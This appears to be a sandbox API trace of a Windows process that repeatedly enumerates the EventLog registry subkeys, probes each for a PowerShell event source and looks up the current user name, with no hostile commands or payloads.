	[0227.878] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e418 | out: phkResult=0x29e418*=0x330) returned 0x0
	[0227.878] RegQueryInfoKeyW (in: hKey=0x330, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x29e480, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29e47c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x29e480*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29e47c*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0227.881] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x0, lpName=0x7a4288, lpcchName=0x29e49c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x29e49c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0227.881] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x1, lpName=0x7a4288, lpcchName=0x29e49c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x29e49c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0227.881] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x2, lpName=0x7a4288, lpcchName=0x29e49c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x29e49c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0227.881] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x3, lpName=0x7a4288, lpcchName=0x29e49c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x29e49c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0227.882] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x4, lpName=0x7a4288, lpcchName=0x29e49c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x29e49c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0227.882] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x5, lpName=0x7a4288, lpcchName=0x29e49c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x29e49c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0227.882] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x6, lpName=0x7a4288, lpcchName=0x29e49c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x29e49c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0227.882] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x7, lpName=0x7a4288, lpcchName=0x29e49c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x29e49c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0227.883] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x8, lpName=0x7a4288, lpcchName=0x29e49c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x29e49c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0227.883] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e448 | out: phkResult=0x29e448*=0x334) returned 0x0
	[0227.883] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e448 | out: phkResult=0x29e448*=0x0) returned 0x2
	[0227.883] RegOpenKeyExW (in: hKey=0x330, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e448 | out: phkResult=0x29e448*=0x354) returned 0x0
	[0227.884] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e448 | out: phkResult=0x29e448*=0x0) returned 0x2
	[0227.884] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e448 | out: phkResult=0x29e448*=0x360) returned 0x0
	[0227.884] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e448 | out: phkResult=0x29e448*=0x0) returned 0x2
	[0227.884] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e448 | out: phkResult=0x29e448*=0x364) returned 0x0
	[0227.885] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e448 | out: phkResult=0x29e448*=0x0) returned 0x2
	[0227.885] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e448 | out: phkResult=0x29e448*=0x368) returned 0x0
	[0227.885] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e448 | out: phkResult=0x29e448*=0x0) returned 0x2
	[0227.989] RegOpenKeyExW (in: hKey=0x330, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e448 | out: phkResult=0x29e448*=0x36c) returned 0x0
	[0227.989] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e448 | out: phkResult=0x29e448*=0x0) returned 0x2
	[0227.989] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e448 | out: phkResult=0x29e448*=0x370) returned 0x0
	[0227.990] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e448 | out: phkResult=0x29e448*=0x0) returned 0x2
	[0227.990] RegOpenKeyExW (in: hKey=0x330, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e448 | out: phkResult=0x29e448*=0x374) returned 0x0
	[0227.990] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e448 | out: phkResult=0x29e448*=0x0) returned 0x2
	[0227.990] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e448 | out: phkResult=0x29e448*=0x378) returned 0x0
	[0227.991] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e448 | out: phkResult=0x29e448*=0x37c) returned 0x0
	[0227.991] RegCloseKey (hKey=0x37c) returned 0x0
	[0227.991] RegCloseKey (hKey=0x330) returned 0x0
	[0227.992] RegCloseKey (hKey=0x378) returned 0x0
	[0228.008] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x7a4a48, nSize=0x29e594 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x29e594) returned 0x1
	[0228.009] GetLastError () returned 0x3
	[0228.011] GetUserNameW (in: lpBuffer=0x7a4288, pcbBuffer=0x29e59c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29e59c) returned 1
	[0228.385] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e3fc | out: phkResult=0x29e3fc*=0x330) returned 0x0
	[0228.386] RegQueryInfoKeyW (in: hKey=0x330, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x29e464, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29e460, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x29e464*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29e460*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0228.386] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x0, lpName=0x7a4288, lpcchName=0x29e480, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x29e480, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0228.386] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x1, lpName=0x7a4288, lpcchName=0x29e480, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x29e480, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0228.386] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x2, lpName=0x7a4288, lpcchName=0x29e480, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x29e480, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0228.386] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x3, lpName=0x7a4288, lpcchName=0x29e480, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x29e480, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0228.387] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x4, lpName=0x7a4288, lpcchName=0x29e480, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x29e480, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0228.387] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x5, lpName=0x7a4288, lpcchName=0x29e480, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x29e480, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0228.387] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x6, lpName=0x7a4288, lpcchName=0x29e480, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x29e480, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0228.387] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x7, lpName=0x7a4288, lpcchName=0x29e480, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x29e480, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0228.387] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x8, lpName=0x7a4288, lpcchName=0x29e480, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x29e480, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0228.388] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x37c) returned 0x0
	[0228.388] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x0) returned 0x2
	[0228.388] RegOpenKeyExW (in: hKey=0x330, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x380) returned 0x0
	[0228.388] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x0) returned 0x2
	[0228.389] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x384) returned 0x0
	[0228.389] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x0) returned 0x2
	[0228.389] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x388) returned 0x0
	[0228.390] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x0) returned 0x2
	[0228.390] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x38c) returned 0x0
	[0228.390] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x0) returned 0x2
	[0228.390] RegOpenKeyExW (in: hKey=0x330, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x390) returned 0x0
	[0228.390] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x0) returned 0x2
	[0228.391] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x394) returned 0x0
	[0228.391] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x0) returned 0x2
	[0228.391] RegOpenKeyExW (in: hKey=0x330, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x398) returned 0x0
	[0228.391] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x0) returned 0x2
	[0228.391] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x39c) returned 0x0
	[0228.392] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x3a0) returned 0x0
	[0228.392] RegCloseKey (hKey=0x3a0) returned 0x0
	[0228.392] RegCloseKey (hKey=0x330) returned 0x0
	[0228.392] RegCloseKey (hKey=0x39c) returned 0x0
	[0228.393] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e3fc | out: phkResult=0x29e3fc*=0x39c) returned 0x0
	[0228.393] RegQueryInfoKeyW (in: hKey=0x39c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x29e464, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29e460, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x29e464*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29e460*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0228.393] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x0, lpName=0x7a4288, lpcchName=0x29e480, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x29e480, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0228.393] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x1, lpName=0x7a4288, lpcchName=0x29e480, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x29e480, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0228.393] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x2, lpName=0x7a4288, lpcchName=0x29e480, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x29e480, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0228.394] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x3, lpName=0x7a4288, lpcchName=0x29e480, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x29e480, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0228.394] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x4, lpName=0x7a4288, lpcchName=0x29e480, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x29e480, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0228.394] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x5, lpName=0x7a4288, lpcchName=0x29e480, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x29e480, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0228.394] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x6, lpName=0x7a4288, lpcchName=0x29e480, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x29e480, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0228.395] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x7, lpName=0x7a4288, lpcchName=0x29e480, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x29e480, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0228.395] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x8, lpName=0x7a4288, lpcchName=0x29e480, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x29e480, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0228.395] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x330) returned 0x0
	[0228.395] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x0) returned 0x2
	[0228.395] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x3a0) returned 0x0
	[0228.396] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x0) returned 0x2
	[0228.396] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x3a4) returned 0x0
	[0228.396] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x0) returned 0x2
	[0228.396] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x3a8) returned 0x0
	[0228.397] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x0) returned 0x2
	[0228.397] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x3ac) returned 0x0
	[0228.397] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x0) returned 0x2
	[0228.397] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x3b0) returned 0x0
	[0228.398] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x0) returned 0x2
	[0228.398] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x3b4) returned 0x0
	[0228.398] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x0) returned 0x2
	[0228.398] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x3b8) returned 0x0
	[0228.398] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x0) returned 0x2
	[0228.399] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x3bc) returned 0x0
	[0228.400] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e42c | out: phkResult=0x29e42c*=0x3c0) returned 0x0
	[0228.400] RegCloseKey (hKey=0x3c0) returned 0x0
	[0228.400] RegCloseKey (hKey=0x39c) returned 0x0
	[0228.400] RegCloseKey (hKey=0x3bc) returned 0x0
	[0228.401] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e3f0 | out: phkResult=0x29e3f0*=0x3bc) returned 0x0
	[0228.401] RegQueryInfoKeyW (in: hKey=0x3bc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x29e458, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29e454, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x29e458*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29e454*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0228.401] RegEnumKeyExW (in: hKey=0x3bc, dwIndex=0x0, lpName=0x7a4288, lpcchName=0x29e474, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x29e474, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0228.401] RegEnumKeyExW (in: hKey=0x3bc, dwIndex=0x1, lpName=0x7a4288, lpcchName=0x29e474, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x29e474, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0228.401] RegEnumKeyExW (in: hKey=0x3bc, dwIndex=0x2, lpName=0x7a4288, lpcchName=0x29e474, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x29e474, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0228.401] RegEnumKeyExW (in: hKey=0x3bc, dwIndex=0x3, lpName=0x7a4288, lpcchName=0x29e474, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x29e474, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0228.402] RegEnumKeyExW (in: hKey=0x3bc, dwIndex=0x4, lpName=0x7a4288, lpcchName=0x29e474, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x29e474, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0228.402] RegEnumKeyExW (in: hKey=0x3bc, dwIndex=0x5, lpName=0x7a4288, lpcchName=0x29e474, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x29e474, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0228.402] RegEnumKeyExW (in: hKey=0x3bc, dwIndex=0x6, lpName=0x7a4288, lpcchName=0x29e474, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x29e474, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0228.402] RegEnumKeyExW (in: hKey=0x3bc, dwIndex=0x7, lpName=0x7a4288, lpcchName=0x29e474, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x29e474, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0228.402] RegEnumKeyExW (in: hKey=0x3bc, dwIndex=0x8, lpName=0x7a4288, lpcchName=0x29e474, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x29e474, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0228.402] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e420 | out: phkResult=0x29e420*=0x39c) returned 0x0
	[0228.402] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e420 | out: phkResult=0x29e420*=0x0) returned 0x2
	[0228.403] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e420 | out: phkResult=0x29e420*=0x3c0) returned 0x0
	[0228.403] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e420 | out: phkResult=0x29e420*=0x0) returned 0x2
	[0228.403] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e420 | out: phkResult=0x29e420*=0x3c4) returned 0x0
	[0228.403] RegOpenKeyExW (in: hKey=0x3c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e420 | out: phkResult=0x29e420*=0x0) returned 0x2
	[0228.404] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e420 | out: phkResult=0x29e420*=0x3c8) returned 0x0
	[0228.404] RegOpenKeyExW (in: hKey=0x3c8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e420 | out: phkResult=0x29e420*=0x0) returned 0x2
	[0228.404] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e420 | out: phkResult=0x29e420*=0x3cc) returned 0x0
